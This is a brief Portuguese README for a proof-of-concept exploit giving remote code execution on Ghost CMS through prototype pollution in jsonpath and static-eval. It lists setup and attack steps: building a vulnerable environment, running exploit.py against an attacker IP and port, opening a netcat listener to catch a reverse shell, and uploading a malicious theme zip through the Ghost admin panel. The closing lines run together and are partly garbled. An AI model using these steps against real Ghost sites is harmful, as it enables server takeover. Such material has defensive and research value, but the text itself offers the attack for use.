
Prova de conceito de exploit para execução remota de código no Ghost CMS via poluição de protótipo em jsonpath e static-eval, com configuração de ambiente vulnerável e instruções de uso.
RCE no Ghost CMS via cadeia de protótipos jsonpath/static-eval.
cd build
./build.sh
python3 exploit.py -i <YOUR_IP> -p <PORT>
nc -lvnp <PORT>malicious-theme.zip para Ghost Admin → Settings → Designrce/rce/